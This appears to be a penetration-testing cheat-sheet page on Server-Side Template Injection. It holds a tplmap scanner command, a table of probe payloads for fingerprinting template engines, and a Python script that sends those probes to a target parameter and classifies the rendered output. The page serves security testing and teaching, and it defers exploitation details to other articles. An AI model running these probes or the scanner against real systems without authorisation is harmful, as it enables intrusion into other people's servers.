SSTI (Server-Side Template Injection)

Automation

Tplmap is an automated scanner for Server-Side Template Injection: it injects probe expressions into a parameter, fingerprints the template engine from how they render, and can escalate to code execution through the engine. A basic run against a GET parameter:

./tplmap.py -u http://vulnerable.com/?name=test


Identify the Template Engine/Framework/Language

Payload                     Template Engine/Framework/Language
a{*comment*}b               Smarty
#{ 2*3 }                    Pug, Spring
*{ 2*3 }                    Spring
${"z".join("ab")}           Mako, ???
{{ '7'*7 }}                 Angular, Django, Flask, Go, Jinja2, Tornado, Twig, ???
{{:2*3}}                    JsRender
{% debug %}                 Django
<%= 7*7 %>                  ERB (Embedded Ruby)

The payload alone is not enough; the rendered output is what identifies the engine. Compare the response against a baseline request: a probe that comes back verbatim was not evaluated, and an evaluated probe shows the result in place of the expression (a{*comment*}b becomes ab, ${"z".join("ab")} becomes azb, the arithmetic probes become 6 or 49). The {{ '7'*7 }} probe separates the curly-brace engines: Jinja2 (used by Flask) and Tornado evaluate it as Python and render 7777777, while Twig coerces the string to a number and renders 49. Django does not evaluate arithmetic in {{ }}, which is why {% debug %} is used for it, and if the expression is only evaluated in the browser the issue is client-side template injection (Angular), not SSTI.
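The following is an added example of that fingerprinting logic in Python; it is not code from the original page or from tplmap. It wraps each probe in a sentinel string so the rendered fragment can be cut out of the response, then maps the fragment to the engines that would produce it. The target URL, parameter name and sentinel are assumptions, and the sample responses are constructed to mimic a Jinja2-backed page.

```python
import re
import urllib.parse
import urllib.request

# Constructed marker wrapped around every probe so the rendered fragment can be
# isolated from the rest of the page. Assumed not to occur naturally in the target.
SENTINEL = "zq9x"

# (payload, {rendered output: candidate engines}). Only engines whose rendering
# of the probe is known are listed; Django is identified separately via
# {% debug %}, Go errors on arithmetic, and Angular evaluates in the browser.
PROBES = [
    ("a{*comment*}b", {"ab": ["Smarty"]}),
    ("#{ 2*3 }", {"6": ["Pug", "Spring"]}),
    ("*{ 2*3 }", {"6": ["Spring"]}),
    ('${"z".join("ab")}', {"azb": ["Mako"]}),
    # Python string repetition vs. PHP-style numeric coercion.
    ("{{ '7'*7 }}", {"7777777": ["Jinja2", "Tornado"], "49": ["Twig"]}),
    ("{{:2*3}}", {"6": ["JsRender"]}),
    ("<%= 7*7 %>", {"49": ["ERB"]}),
]


def rendered_between(body, sentinel=SENTINEL):
    """Return the text between the two sentinels, or None if they are missing
    (e.g. the engine threw a syntax error and returned an error page)."""
    m = re.search(re.escape(sentinel) + r"(.*?)" + re.escape(sentinel), body, re.S)
    return None if m is None else m.group(1)


def classify(responses):
    """responses maps payload -> response body for a request that sent
    SENTINEL + payload + SENTINEL. Returns engine -> list of probes that
    rendered the way that engine would."""
    hits = {}
    for payload, outcomes in PROBES:
        body = responses.get(payload)
        if body is None:
            continue
        got = rendered_between(body)
        # Sentinel missing (error page) or probe reflected verbatim: not evaluated.
        if got is None or got == payload:
            continue
        for engine in outcomes.get(got.strip(), []):
            hits.setdefault(engine, []).append(payload)
    return hits


def probe_url(url, param, timeout=10):
    """Send every probe in the given GET parameter and collect the bodies.
    Assumes the parameter is reflected into a server-side template."""
    responses = {}
    for payload, _ in PROBES:
        query = urllib.parse.urlencode({param: SENTINEL + payload + SENTINEL})
        sep = "&" if "?" in url else "?"
        with urllib.request.urlopen(url + sep + query, timeout=timeout) as resp:
            responses[payload] = resp.read().decode(errors="replace")
    return responses


def fake_jinja2_responses():
    """Constructed responses imitating a Flask/Jinja2 page: Jinja2 evaluates
    its own syntax, reflects foreign syntax unchanged, and raises a template
    syntax error (no sentinel in the body) on the JsRender probe."""
    out = {}
    for payload, _ in PROBES:
        if payload == "{{:2*3}}":
            out[payload] = "<h1>Internal Server Error</h1>"
            continue
        rendered = "7777777" if payload == "{{ '7'*7 }}" else payload
        out[payload] = f"<p>Hello {SENTINEL}{rendered}{SENTINEL}</p>"
    return out


if __name__ == "__main__":
    # Offline demonstration on the constructed responses; swap in
    # probe_url("http://vulnerable.com/", "name") against a real target.
    print(classify(fake_jinja2_responses()))
```

Against the constructed Jinja2 responses the classifier reports Jinja2 and Tornado as candidates, which is the expected ambiguity: both evaluate Python, so a follow-up probe using engine-specific syntax is needed to separate them.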


SSTI for Each Framework

See the per-framework articles for the exploitation details of each engine once it has been identified.